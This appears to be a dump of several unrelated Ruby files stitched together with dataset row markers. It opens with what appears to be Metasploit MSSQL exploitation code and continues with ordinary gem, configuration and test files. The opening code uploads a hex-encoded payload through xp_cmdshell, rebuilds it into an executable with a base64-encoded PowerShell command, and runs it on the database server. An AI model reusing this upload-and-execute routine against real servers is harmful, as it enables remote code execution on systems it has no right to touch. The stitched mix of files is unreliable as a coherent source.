h2b = "$s = gc 'C:\\Windows\\Temp\\#{var_payload}';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\#{var_payload}.exe',$b)"
h2b_unicode=Rex::Text.to_unicode(h2b)
# base64 encode it, this allows us to perform execution through powershell without registry changes
h2b_encoded = Rex::Text.encode_base64(h2b_unicode)
print_status("Uploading the payload #{var_payload}, please be patient...")
idx = 0
cnt = 500
while(idx < hex.length - 1)
mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
idx += cnt
end
print_status("Converting the payload utilizing PowerShell EncodedCommand...")
mssql_xpcmdshell("powershell -EncodedCommand #{h2b_encoded}", debug)
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
print_status("Executing the payload...")
mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
print_status("Be sure to cleanup #{var_payload}.exe...")
end
#
# Send and receive using TDS
#
def mssql_send_recv(req, timeout=15, check_status = true)
sock.put(req)
# Read the 8 byte header to get the length and status
# Read the length to get the data
# If the status is 0, read another header and more data
done = false
resp = ""
while(not done)
head = sock.get_once(8, timeout)
if !(head && head.length == 8)
return false
end
# Is this the last buffer?
if(head[1, 1] == "\x01" or not check_status )
done = true
end
# Grab this block's length
rlen = head[2, 2].unpack('n')[0] - 8
while(rlen > 0)
buff = sock.get_once(rlen, timeout)
return if not buff
resp << buff
rlen -= buff.length
end
end
resp
end
#
# Encrypt a password according to the TDS protocol (encode)
#
def mssql_tds_encrypt(pass)
# Convert to unicode, swap 4 bits both ways, xor with 0xa5
Rex::Text.to_unicode(pass).unpack('C*').map {|c| (((c & 0x0f) << 4) + ((c & 0xf0) >> 4)) ^ 0xa5 }.pack("C*")
end
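  # Worked example (illustrative): 'a' (0x61) becomes the UTF-16LE pair 0x61 0x00;
  # nibble-swapping gives 0x16 0x00 and XOR with 0xA5 yields 0xB3 0xA5, so
  # mssql_tds_encrypt('a') == "\xB3\xA5".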
#
#this method send a prelogin packet and check if encryption is off
#
def mssql_prelogin(enc_error=false)
pkt = ""
pkt_hdr = ""
pkt_data_token = ""
pkt_data = ""
pkt_hdr = [
TYPE_PRE_LOGIN_MESSAGE, #type
STATUS_END_OF_MESSAGE, #status
0x0000, #length
0x0000, # SPID
0x00, # PacketID
0x00 #Window
]
version = [0x55010008, 0x0000].pack("Vv")
    encryption = ENCRYPT_NOT_SUP # encryption not supported
instoptdata = "MSSQLServer\0"
threadid = "\0\0" + Rex::Text.rand_text(2)
idx = 21 # size of pkt_data_token
pkt_data_token << [
0x00, # Token 0 type Version
idx, # VersionOffset
version.length, # VersionLength
0x01, # Token 1 type Encryption
idx = idx + version.length, # EncryptionOffset
0x01, # EncryptionLength
0x02, # Token 2 type InstOpt
idx = idx + 1, # InstOptOffset
instoptdata.length, # InstOptLength
0x03, # Token 3 type Threadid
idx + instoptdata.length, # ThreadIdOffset
0x04, # ThreadIdLength
0xFF
].pack("CnnCnnCnnCnnC")
pkt_data << pkt_data_token
pkt_data << version
pkt_data << encryption
pkt_data << instoptdata
pkt_data << threadid
pkt_hdr[2] = pkt_data.length + 8
pkt = pkt_hdr.pack("CCnnCC") + pkt_data
resp = mssql_send_recv(pkt)
idx = 0
while resp && resp[0, 1] != "\xff" && resp.length > 5
token = resp.slice!(0, 5)
token = token.unpack("Cnn")
idx -= 5
if token[0] == 0x01
idx += token[1]
break
end
end
if idx > 0
encryption_mode = resp[idx, 1].unpack("C")[0]
else
# force to ENCRYPT_NOT_SUP and hope for the best
encryption_mode = ENCRYPT_NOT_SUP
end
if encryption_mode != ENCRYPT_NOT_SUP && enc_error
raise RuntimeError,"Encryption is not supported"
end
encryption_mode
end
#
# This method connects to the server over TCP and attempts
# to authenticate with the supplied username and password
# The global socket is used and left connected after auth
#
def mssql_login(user='sa', pass='', db='')
disconnect if self.sock
connect
begin
# Send a prelogin packet and check that encryption is not enabled
if mssql_prelogin != ENCRYPT_NOT_SUP
print_error('Encryption is not supported')
return false
end
rescue EOFError
print_error('Probable server or network failure')
return false
end
if datastore['USE_WINDOWS_AUTHENT']
idx = 0
pkt = ''
pkt_hdr = ''
pkt_hdr = [
TYPE_TDS7_LOGIN, #type
STATUS_END_OF_MESSAGE, #status
0x0000, #length
0x0000, # SPID
        0x01, # PacketID (unused per the specification,
        # but MS Network Monitor still prefers 1 to decode correctly; Wireshark doesn't care)
0x00 #Window
]
pkt << [
0x00000000, # Size
0x71000001, # TDS Version
0x00000000, # Dummy Size
0x00000007, # Version
rand(1024+1), # PID
0x00000000, # ConnectionID
0xe0, # Option Flags 1
0x83, # Option Flags 2
0x00, # SQL Type Flags
0x00, # Reserved Flags
0x00000000, # Time Zone
0x00000000 # Collation
].pack('VVVVVVCCCCVV')
cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
sname = Rex::Text.to_unicode( rhost )
dname = Rex::Text.to_unicode( db )
workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
ntlm_client = ::Net::NTLM::Client.new(
user,
pass,
workstation: workstation_name,
domain: datastore['DOMAIN'],
)
type1 = ntlm_client.init_context
# SQL 2012, at least, does not support KEY_EXCHANGE
type1.flag &= ~ ::Net::NTLM::FLAGS[:KEY_EXCHANGE]
ntlmsspblob = type1.serialize
idx = pkt.size + 50 # lengths below
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
pkt << [0, 0].pack('vv') # User length offset must be 0
pkt << [0, 0].pack('vv') # Password length offset must be 0
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
pkt << [0, 0].pack('vv') # unused
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
pkt << [idx, 0].pack('vv') # locales
pkt << [idx, 0].pack('vv') #db
# ClientID (should be mac address)
pkt << Rex::Text.rand_text(6)
# NTLMSSP
pkt << [idx, ntlmsspblob.length].pack('vv')
idx += ntlmsspblob.length
pkt << [idx, 0].pack('vv') # AtchDBFile
pkt << cname
pkt << aname
pkt << sname
pkt << aname
pkt << ntlmsspblob
# Total packet length
pkt[0, 4] = [pkt.length].pack('V')
pkt_hdr[2] = pkt.length + 8
pkt = pkt_hdr.pack("CCnnCC") + pkt
      # Rem: check_status has to be set to false here because SQL Server SP0 (and maybe above)
      # has a strange behavior that differs from the specification:
      # upon receiving the NTLM negotiate request it sends an NTLM challenge, but the status flag of the TDS packet header
      # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the NTLM authentication
resp = mssql_send_recv(pkt, 15, false)
unless resp.include?("NTLMSSP")
info = {:errors => []}
mssql_parse_reply(resp, info)
mssql_print_reply(info)
return false
end
# Get default data
resp = resp[3..-1]
type3 = ntlm_client.init_context([resp].pack('m'))
type3_blob = type3.serialize
# Create an SSPIMessage
idx = 0
pkt = ''
pkt_hdr = ''
pkt_hdr = [
TYPE_SSPI_MESSAGE, #type
STATUS_END_OF_MESSAGE, #status
0x0000, #length
0x0000, # SPID
0x01, # PacketID
0x00 #Window
]
pkt_hdr[2] = type3_blob.length + 8
pkt = pkt_hdr.pack("CCnnCC") + type3_blob
resp = mssql_send_recv(pkt)
    # SQL Server authentication
else
idx = 0
pkt = ''
pkt << [
0x00000000, # Dummy size
0x71000001, # TDS Version
0x00000000, # Size
0x00000007, # Version
rand(1024+1), # PID
0x00000000, # ConnectionID
0xe0, # Option Flags 1
0x03, # Option Flags 2
0x00, # SQL Type Flags
0x00, # Reserved Flags
0x00000000, # Time Zone
0x00000000 # Collation
].pack('VVVVVVCCCCVV')
cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
uname = Rex::Text.to_unicode( user )
pname = mssql_tds_encrypt( pass )
aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
sname = Rex::Text.to_unicode( rhost )
dname = Rex::Text.to_unicode( db )
idx = pkt.size + 50 # lengths below
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
pkt << [idx, uname.length / 2].pack('vv')
idx += uname.length
pkt << [idx, pname.length / 2].pack('vv')
idx += pname.length
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
pkt << [0, 0].pack('vv')
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
pkt << [idx, 0].pack('vv')
pkt << [idx, dname.length / 2].pack('vv')
idx += dname.length
# The total length has to be embedded twice more here
pkt << [
0,
0,
0x12345678,
0x12345678
].pack('vVVV')
pkt << cname
pkt << uname
pkt << pname
pkt << aname
pkt << sname
pkt << aname
pkt << dname
# Total packet length
pkt[0, 4] = [pkt.length].pack('V')
# Embedded packet lengths
pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2
# Packet header and total length including header
pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
begin
resp = mssql_send_recv(pkt)
rescue EOFError
print_error('Probable server or network failure')
return false
end
end
info = {:errors => []}
info = mssql_parse_reply(resp, info)
return false if not info
info[:login_ack] ? true : false
end
#
# Login to the SQL server using the standard USERNAME/PASSWORD options
#
def mssql_login_datastore(db='')
mssql_login(datastore['USERNAME'], datastore['PASSWORD'], db)
end
#
# Issue a SQL query using the TDS protocol
#
def mssql_query(sqla, doprint=false, opts={})
info = { :sql => sqla }
opts[:timeout] ||= 15
pkts = []
idx = 0
bsize = 4096 - 8
chan = 0
@cnt ||= 0
@cnt += 1
sql = Rex::Text.to_unicode(sqla)
while(idx < sql.length)
buf = sql[idx, bsize]
flg = buf.length < bsize ? "\x01" : "\x00"
pkts << "\x01" + flg + [buf.length + 8].pack('n') + [chan].pack('n') + [@cnt].pack('C') + "\x00" + buf
idx += bsize
end
resp = mssql_send_recv(pkts.join, opts[:timeout])
mssql_parse_reply(resp, info)
mssql_print_reply(info) if doprint
info
end
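  # Illustrative call, using only the method above: after a successful mssql_login,
  #   mssql_query('SELECT @@VERSION', true)
  # sends the batch over the TDS connection and prints the parsed rows via
  # mssql_print_reply.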
#
# Nicely print the results of a SQL query
#
def mssql_print_reply(info)
print_status("SQL Query: #{info[:sql]}")
if info[:done] && info[:done][:rows].to_i > 0
print_status("Row Count: #{info[:done][:rows]} (Status: #{info[:done][:status]} Command: #{info[:done][:cmd]})")
end
if info[:errors] && !info[:errors].empty?
info[:errors].each do |err|
print_error(err)
end
end
if info[:rows] && !info[:rows].empty?
tbl = Rex::Text::Table.new(
'Indent' => 1,
'Header' => "",
'Columns' => info[:colnames],
'SortIndex' => -1
)
info[:rows].each do |row|
tbl << row
end
print_line(tbl.to_s)
end
end
#
# Parse a raw TDS reply from the server
#
def mssql_parse_tds_reply(data, info)
info[:errors] ||= []
info[:colinfos] ||= []
info[:colnames] ||= []
# Parse out the columns
cols = data.slice!(0, 2).unpack('v')[0]
0.upto(cols-1) do |col_idx|
col = {}
info[:colinfos][col_idx] = col
col[:utype] = data.slice!(0, 2).unpack('v')[0]
col[:flags] = data.slice!(0, 2).unpack('v')[0]
col[:type] = data.slice!(0, 1).unpack('C')[0]
case col[:type]
when 48
col[:id] = :tinyint
when 52
col[:id] = :smallint
when 56
col[:id] = :rawint
when 61
col[:id] = :datetime
when 34
col[:id] = :image
col[:max_size] = data.slice!(0, 4).unpack('V')[0]
col[:value_length] = data.slice!(0, 2).unpack('v')[0]
col[:value] = data.slice!(0, col[:value_length] * 2).gsub("\x00", '')
when 36
col[:id] = :string
when 38
col[:id] = :int
col[:int_size] = data.slice!(0, 1).unpack('C')[0]
when 127
col[:id] = :bigint
when 165
col[:id] = :hex
col[:max_size] = data.slice!(0, 2).unpack('v')[0]
when 173
col[:id] = :hex # binary(2)
col[:max_size] = data.slice!(0, 2).unpack('v')[0]
when 231, 175, 167, 239
col[:id] = :string
col[:max_size] = data.slice!(0, 2).unpack('v')[0]
col[:codepage] = data.slice!(0, 2).unpack('v')[0]
col[:cflags] = data.slice!(0, 2).unpack('v')[0]
col[:charset_id] = data.slice!(0, 1).unpack('C')[0]
else
col[:id] = :unknown
end
col[:msg_len] = data.slice!(0, 1).unpack('C')[0]
if col[:msg_len] && col[:msg_len] > 0
col[:name] = data.slice!(0, col[:msg_len] * 2).gsub("\x00", '')
end
info[:colnames] << (col[:name] || 'NULL')
end
end
#
# Parse individual tokens from a TDS reply
#
def mssql_parse_reply(data, info)
info[:errors] = []
return if not data
until data.empty?
token = data.slice!(0, 1).unpack('C')[0]
case token
when 0x81
mssql_parse_tds_reply(data, info)
when 0xd1
mssql_parse_tds_row(data, info)
when 0xe3
mssql_parse_env(data, info)
when 0x79
mssql_parse_ret(data, info)
when 0xfd, 0xfe, 0xff
mssql_parse_done(data, info)
when 0xad
mssql_parse_login_ack(data, info)
when 0xab
mssql_parse_info(data, info)
when 0xaa
mssql_parse_error(data, info)
when nil
break
else
info[:errors] << "unsupported token: #{token}"
end
end
info
end
#
# Parse a single row of a TDS reply
#
def mssql_parse_tds_row(data, info)
info[:rows] ||= []
row = []
info[:colinfos].each do |col|
if(data.length == 0)
row << "<EMPTY>"
next
end
case col[:id]
when :hex
str = ""
len = data.slice!(0, 2).unpack('v')[0]
if len > 0 && len < 65535
str << data.slice!(0, len)
end
row << str.unpack("H*")[0]
when :string
str = ""
len = data.slice!(0, 2).unpack('v')[0]
if len > 0 && len < 65535
str << data.slice!(0, len)
end
row << str.gsub("\x00", '')
when :datetime
row << data.slice!(0, 8).unpack("H*")[0]
when :rawint
row << data.slice!(0, 4).unpack('V')[0]
when :bigint
row << data.slice!(0, 8).unpack("H*")[0]
when :smallint
row << data.slice!(0, 2).unpack("v")[0]
when :smallint3
row << [data.slice!(0, 3)].pack("Z4").unpack("V")[0]
when :tinyint
row << data.slice!(0, 1).unpack("C")[0]
when :image
str = ''
len = data.slice!(0, 1).unpack('C')[0]
str = data.slice!(0, len) if len && len > 0
row << str.unpack("H*")[0]
when :int
len = data.slice!(0, 1).unpack("C")[0]
raw = data.slice!(0, len) if len && len > 0
case len
when 0, 255
row << ''
when 1
row << raw.unpack("C")[0]
when 2
row << raw.unpack('v')[0]
when 4
row << raw.unpack('V')[0]
when 5
row << raw.unpack('V')[0] # XXX: missing high byte
when 8
row << raw.unpack('VV')[0] # XXX: missing high dword
else
info[:errors] << "invalid integer size: #{len} #{data[0, 16].unpack("H*")[0]}"
end
else
info[:errors] << "unknown column type: #{col.inspect}"
end
end
info[:rows] << row
info
end
#
# Parse a "ret" TDS token
#
def mssql_parse_ret(data, info)
ret = data.slice!(0, 4).unpack('N')[0]
info[:ret] = ret
info
end
#
# Parse a "done" TDS token
#
def mssql_parse_done(data, info)
status, cmd, rows = data.slice!(0, 8).unpack('vvV')
info[:done] = { :status => status, :cmd => cmd, :rows => rows }
info
end
#
# Parse an "error" TDS token
#
def mssql_parse_error(data, info)
len = data.slice!(0, 2).unpack('v')[0]
buff = data.slice!(0, len)
errno, state, sev, elen = buff.slice!(0, 8).unpack('VCCv')
emsg = buff.slice!(0, elen * 2)
emsg.gsub!("\x00", '')
info[:errors] << "SQL Server Error ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
info
end
#
# Parse an "environment change" TDS token
#
def mssql_parse_env(data, info)
len = data.slice!(0, 2).unpack('v')[0]
buff = data.slice!(0, len)
type = buff.slice!(0, 1).unpack('C')[0]
nval = ''
nlen = buff.slice!(0, 1).unpack('C')[0] || 0
nval = buff.slice!(0, nlen * 2).gsub("\x00", '') if nlen > 0
oval = ''
olen = buff.slice!(0, 1).unpack('C')[0] || 0
oval = buff.slice!(0, olen * 2).gsub("\x00", '') if olen > 0
info[:envs] ||= []
info[:envs] << { :type => type, :old => oval, :new => nval }
info
end
#
# Parse an "information" TDS token
#
def mssql_parse_info(data, info)
len = data.slice!(0, 2).unpack('v')[0]
buff = data.slice!(0, len)
errno, state, sev, elen = buff.slice!(0, 8).unpack('VCCv')
emsg = buff.slice!(0, elen * 2)
emsg.gsub!("\x00", '')
info[:infos] ||= []
info[:infos] << "SQL Server Info ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
info
end
#
# Parse a "login ack" TDS token
#
def mssql_parse_login_ack(data, info)
len = data.slice!(0, 2).unpack('v')[0]
_buff = data.slice!(0, len)
info[:login_ack] = true
end
end
end
| 27.395397 | 319 | 0.571554 |
f7872f07ab690486deb54b3fb2abaa7101272883 | 2,530 | # frozen_string_literal: true
require 'common/client/configuration/rest'
require 'common/client/middleware/request/camelcase'
require 'common/client/middleware/response/json_parser'
require 'common/client/middleware/response/raise_error'
require 'common/client/middleware/response/mhv_errors'
require 'common/client/middleware/response/snakecase'
require 'common/client/middleware/response/mhv_xml_html_errors'
require 'rx/middleware/response/rx_parser'
require 'rx/middleware/response/rx_failed_station'
require 'typhoeus'
require 'typhoeus/adapters/faraday'
module Rx
# Configuration class used to setup the environment used by client
class Configuration < Common::Client::Configuration::REST
def app_token
Settings.mhv.rx.app_token
end
def base_path
"#{Settings.mhv.rx.host}/mhv-api/patient/v1/"
end
def caching_enabled?
Settings.mhv.rx.collection_caching_enabled || false
end
def service_name
'Rx'
end
def connection
Faraday.new(base_path, headers: base_request_headers, request: request_options) do |conn|
conn.use :breakers
conn.request :json
# Uncomment this if you want curl command equivalent or response output to log
# conn.request(:curl, ::Logger.new(STDOUT), :warn) unless Rails.env.production?
# conn.response(:logger, ::Logger.new(STDOUT), bodies: true) unless Rails.env.production?
conn.response :betamocks if Settings.mhv.rx.mock
conn.response :rx_failed_station
conn.response :rx_parser
conn.response :snakecase
conn.response :raise_error, error_prefix: service_name
conn.response :mhv_errors
conn.response :mhv_xml_html_errors
conn.response :json_parser
conn.adapter Faraday.default_adapter
end
end
def parallel_connection
Faraday.new(base_path, headers: base_request_headers, request: request_options) do |conn|
conn.use :breakers
conn.request :camelcase
conn.request :json
# Uncomment this if you want curl command equivalent or response output to log
# conn.request(:curl, ::Logger.new(STDOUT), :warn) unless Rails.env.production?
# conn.response(:logger, ::Logger.new(STDOUT), bodies: true) unless Rails.env.production?
conn.response :snakecase
conn.response :raise_error, error_prefix: service_name
conn.response :mhv_errors
conn.response :json_parser
conn.adapter :typhoeus
end
end
end
end
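  # Hypothetical usage sketch: a client built on Common::Client::Base would
  # typically point at this configuration, e.g.
  #   class Client < Common::Client::Base
  #     configuration Rx::Configuration
  #   end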
| 33.289474 | 97 | 0.716601 |
f834b96bb919420a805f3662f6712e3fc5d3826a | 2,456 | require File.expand_path('../../fixtures/constants', __FILE__)
module ConstantSpecs
end
describe "Module#const_set" do
it "sets the constant specified by a String or Symbol to the given value" do
ConstantSpecs.const_set :CS_CONST401, :const401
ConstantSpecs::CS_CONST401.should == :const401
ConstantSpecs.const_set "CS_CONST402", :const402
ConstantSpecs.const_get(:CS_CONST402).should == :const402
end
it "returns the value set" do
ConstantSpecs.const_set(:CS_CONST403, :const403).should == :const403
end
# PENDING: needs proper parser implementation
#
# it "sets the name of an anonymous module" do
# m = Module.new
# ConstantSpecs.const_set(:CS_CONST1000, m)
# m.name.should == "ConstantSpecs::CS_CONST1000"
# end
it "raises a NameError if the name does not start with a capital letter" do
lambda { ConstantSpecs.const_set "name", 1 }.should raise_error(NameError)
end
it "raises a NameError if the name starts with a non-alphabetic character" do
lambda { ConstantSpecs.const_set "__CONSTX__", 1 }.should raise_error(NameError)
lambda { ConstantSpecs.const_set "@Name", 1 }.should raise_error(NameError)
lambda { ConstantSpecs.const_set "!Name", 1 }.should raise_error(NameError)
lambda { ConstantSpecs.const_set "::Name", 1 }.should raise_error(NameError)
end
it "raises a NameError if the name contains non-word characters" do
# underscore (i.e., _) is a valid word character
ConstantSpecs.const_set("CS_CONST404", :const404).should == :const404
lambda { ConstantSpecs.const_set "Name=", 1 }.should raise_error(NameError)
lambda { ConstantSpecs.const_set "Name?", 1 }.should raise_error(NameError)
end
# PENDING: should_receive isn't available on opal-spec
#
# it "calls #to_str to convert the given name to a String" do
#
# name = mock("CS_CONST405")
# name.should_receive(:to_str).and_return("CS_CONST405")
# ConstantSpecs.const_set(name, :const405).should == :const405
# ConstantSpecs::CS_CONST405.should == :const405
# end
# PENDING: should_receive isn't available on opal-spec
#
# it "raises a TypeError if conversion to a String by calling #to_str fails" do
# name = mock('123')
# lambda { ConstantSpecs.const_set name, 1 }.should raise_error(TypeError)
#
# name.should_receive(:to_str).and_return(123)
# lambda { ConstantSpecs.const_set name, 1 }.should raise_error(TypeError)
# end
end
| 37.784615 | 84 | 0.721091 |
91d920fb62c01056379ea5529f7940dd8b3c35f6 | 163 | # frozen_string_literal: true
require 'test_helper'
class NavigationTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
end
| 16.3 | 54 | 0.742331 |
62aa0a1046562795966f3b314f1b5af52a368070 | 993 | require "http"
require "noticed/engine"
module Noticed
autoload :Base, "noticed/base"
autoload :Coder, "noticed/coder"
autoload :Translation, "noticed/translation"
module DeliveryMethods
autoload :Base, "noticed/delivery_methods/base"
autoload :ActionCable, "noticed/delivery_methods/action_cable"
autoload :Database, "noticed/delivery_methods/database"
autoload :Email, "noticed/delivery_methods/email"
autoload :Slack, "noticed/delivery_methods/slack"
autoload :Test, "noticed/delivery_methods/test"
autoload :Twilio, "noticed/delivery_methods/twilio"
autoload :Vonage, "noticed/delivery_methods/vonage"
end
def self.notify(recipients:, notification:)
recipients.each do |recipient|
notification.notify(recipient)
end
# Clear the recipient after sending to the group
notification.recipient = nil
end
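  # Minimal usage sketch (CommentNotification is a hypothetical Noticed::Base
  # subclass; `.with` builds an instance carrying the given params):
  #   Noticed.notify(recipients: post.subscribers,
  #                  notification: CommentNotification.with(comment: comment))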
mattr_accessor :parent_class
@@parent_class = "ApplicationJob"
class ValidationError < StandardError
end
end
| 28.371429 | 66 | 0.752266 |
e2241dfd6b91466af500560a93d309efbaffcf08 | 955 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'mina/oblako/version'
Gem::Specification.new do |spec|
spec.name = 'mina-oblako'
spec.version = Mina::Oblako::VERSION
spec.authors = ['gydroperit']
spec.email = ['gydroperit@gmail.com']
spec.summary = %(Mina extended configurator.)
spec.description = %(Configuration and managements Mina tasks for Nginx + Puma.)
spec.homepage = 'https://github.com/gydroperit/mina-oblako.git'
spec.license = 'MIT'
spec.files = `git ls-files`.split($RS)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.add_dependency 'mina', '~> 1'
spec.add_development_dependency 'bundler', '~> 1.5'
spec.add_development_dependency 'rake', '~> 0'
end
| 36.730769 | 84 | 0.652356 |
6153928303a24270c2a82468c48be05c4e48e927 | 1,078 | # -*- coding: utf-8 -*-
require 'helper'
class TestBreaks02 < Test::Unit::TestCase
def setup
setup_dir_var
end
def teardown
File.delete(@xlsx) if File.exist?(@xlsx)
end
def test_page_breaks02
@xlsx = 'page_breaks02.xlsx'
workbook = WriteXLSX.new(@xlsx)
worksheet = workbook.add_worksheet
worksheet.set_h_pagebreaks(15, 7, 3, 0)
worksheet.write('A1', 'Foo')
workbook.close
compare_xlsx_for_regression(
File.join(@regression_output, @xlsx),
@xlsx,
[
'xl/printerSettings/printerSettings1.bin',
'xl/worksheets/_rels/sheet1.xml.rels'
],
{
'[Content_Types].xml' => ['<Default Extension="bin"'],
'xl/worksheets/sheet1.xml' => ['<pageMargins', '<pageSetup']
}
)
end
end
| 29.135135 | 93 | 0.453618 |
ff0882dfcb4cc9ca5f7b27f34980f6f00d3cf362 | 21,531 | # frozen_string_literal: true
require 'spec_helper'
require 'selenium-webdriver'
RSpec.shared_examples 'Capybara::Session' do |session, mode|
let(:session) { session }
context 'with selenium driver' do
describe '#driver' do
it 'should be a selenium driver' do
expect(session.driver).to be_an_instance_of(Capybara::Selenium::Driver)
end
end
describe '#mode' do
it 'should remember the mode' do
expect(session.mode).to eq(mode)
end
end
describe '#reset!' do
it 'freshly reset session should not be touched' do
session.instance_variable_set(:@touched, true)
session.reset!
expect(session.instance_variable_get(:@touched)).to eq false
end
end
describe 'exit codes' do
let(:env) { { 'SELENIUM_BROWSER' => session.driver.options[:browser].to_s } }
let!(:orig_dir) { Dir.getwd }
before do
Dir.chdir(File.join(File.dirname(__FILE__), '..'))
end
after do
Dir.chdir(orig_dir)
end
it 'should have return code 1 when running selenium_driver_rspec_failure.rb' do
skip 'only setup for local non-headless' if headless_or_remote?
skip 'Not setup for edge' if edge?(session)
system(env, 'rspec spec/fixtures/selenium_driver_rspec_failure.rb', out: File::NULL, err: File::NULL)
expect($CHILD_STATUS.exitstatus).to eq(1)
end
it 'should have return code 0 when running selenium_driver_rspec_success.rb' do
skip 'only setup for local non-headless' if headless_or_remote?
skip 'Not setup for edge' if edge?(session)
system(env, 'rspec spec/fixtures/selenium_driver_rspec_success.rb', out: File::NULL, err: File::NULL)
expect($CHILD_STATUS.exitstatus).to eq(0)
end
end
describe '#accept_alert', requires: [:modals] do
it 'supports a blockless mode' do
session.visit('/with_js')
session.click_link('Open alert')
session.accept_alert
expect { session.driver.browser.switch_to.alert }.to raise_error(session.driver.send(:modal_error))
end
it 'can be called before visiting' do
session.accept_alert 'Initial alert' do
session.visit('/initial_alert')
end
expect(session).to have_text('Initial alert page')
end
end
describe '#fill_in_with empty string and no options' do
it 'should trigger change when clearing a field' do
pending "safaridriver doesn't trigger change for clear" if safari?(session)
session.visit('/with_js')
session.fill_in('with_change_event', with: '')
# click outside the field to trigger the change event
session.find(:css, 'body').click
expect(session).to have_selector(:css, '.change_event_triggered', match: :one)
end
end
describe '#fill_in with { :clear => :backspace } fill_option', requires: [:js] do
before do
# Firefox has an issue with change events if the main window doesn't think it's focused
session.execute_script('window.focus()')
end
it 'should fill in a field, replacing an existing value' do
session.visit('/form')
session.fill_in('form_first_name',
with: 'Harry',
fill_options: { clear: :backspace })
expect(session.find(:fillable_field, 'form_first_name').value).to eq('Harry')
end
it 'should fill in a field, replacing an existing value, even with caret position' do
session.visit('/form')
session.find(:css, '#form_first_name').execute_script <<-JS
this.focus();
this.setSelectionRange(0, 0);
JS
session.fill_in('form_first_name',
with: 'Harry',
fill_options: { clear: :backspace })
expect(session.find(:fillable_field, 'form_first_name').value).to eq('Harry')
end
it 'should fill in if the option is set via global option' do
Capybara.default_set_options = { clear: :backspace }
session.visit('/form')
session.fill_in('form_first_name', with: 'Thomas')
expect(session.find(:fillable_field, 'form_first_name').value).to eq('Thomas')
end
it 'should only trigger onchange once' do
session.visit('/with_js')
sleep 2 if safari?(session) # Safari needs a delay (to load event handlers maybe ???)
session.fill_in('with_change_event',
with: 'some value',
fill_options: { clear: :backspace })
# click outside the field to trigger the change event
session.find(:css, '#with_focus_event').click
expect(session.find(:css, '.change_event_triggered', match: :one, wait: 5)).to have_text 'some value'
end
it 'should trigger change when clearing field' do
session.visit('/with_js')
session.fill_in('with_change_event',
with: '',
fill_options: { clear: :backspace })
# click outside the field to trigger the change event
session.find(:css, '#with_focus_event').click
expect(session).to have_selector(:css, '.change_event_triggered', match: :one, wait: 5)
end
it 'should trigger input event field_value.length times' do
session.visit('/with_js')
session.fill_in('with_change_event',
with: '',
fill_options: { clear: :backspace })
# click outside the field to trigger the change event
# session.find(:css, 'body').click
session.find(:css, 'h1', text: 'FooBar').click
expect(session).to have_xpath('//p[@class="input_event_triggered"]', count: 13)
end
end
describe '#fill_in with { clear: :none } fill_options' do
it 'should append to content in a field' do
pending 'Safari overwrites by default - need to figure out a workaround' if safari?(session)
session.visit('/form')
session.fill_in('form_first_name',
with: 'Harry',
fill_options: { clear: :none })
expect(session.find(:fillable_field, 'form_first_name').value).to eq('JohnHarry')
end
it 'works with rapid fill' do
pending 'Safari overwrites by default - need to figure out a workaround' if safari?(session)
long_string = (0...60).map { |i| ((i % 26) + 65).chr }.join
session.visit('/form')
session.fill_in('form_first_name', with: long_string, fill_options: { clear: :none })
expect(session.find(:fillable_field, 'form_first_name').value).to eq('John' + long_string)
end
end
describe '#fill_in with Date' do
before do
session.visit('/form')
session.find(:css, '#form_date').execute_script <<-JS
window.capybara_formDateFiredEvents = [];
var fd = this;
['focus', 'input', 'change'].forEach(function(eventType) {
fd.addEventListener(eventType, function() { window.capybara_formDateFiredEvents.push(eventType); });
});
JS
# work around weird FF issue where it would create an extra focus issue in some cases
session.find(:css, 'h1', text: 'Form').click
# session.find(:css, 'body').click
end
it 'should generate standard events on changing value' do
pending "IE 11 doesn't support date input type" if ie?(session)
pending "Safari doesn't support date input type" if safari?(session)
session.fill_in('form_date', with: Date.today)
expect(session.evaluate_script('window.capybara_formDateFiredEvents')).to eq %w[focus input change]
end
it 'should not generate input and change events if the value is not changed' do
pending "IE 11 doesn't support date input type" if ie?(session)
pending "Safari doesn't support date input type" if safari?(session)
session.fill_in('form_date', with: Date.today)
session.fill_in('form_date', with: Date.today)
# Chrome adds an extra focus for some reason - ok for now
expect(session.evaluate_script('window.capybara_formDateFiredEvents')).to eq(%w[focus input change])
end
end
describe '#fill_in with { clear: Array } fill_options' do
it 'should pass the array through to the element' do
        # this is mainly for use with [[:control, 'a'], :backspace] - however since that is platform dependent I'm testing with something less useful
session.visit('/form')
session.fill_in('form_first_name',
with: 'Harry',
fill_options: { clear: [[:shift, 'abc'], :backspace] })
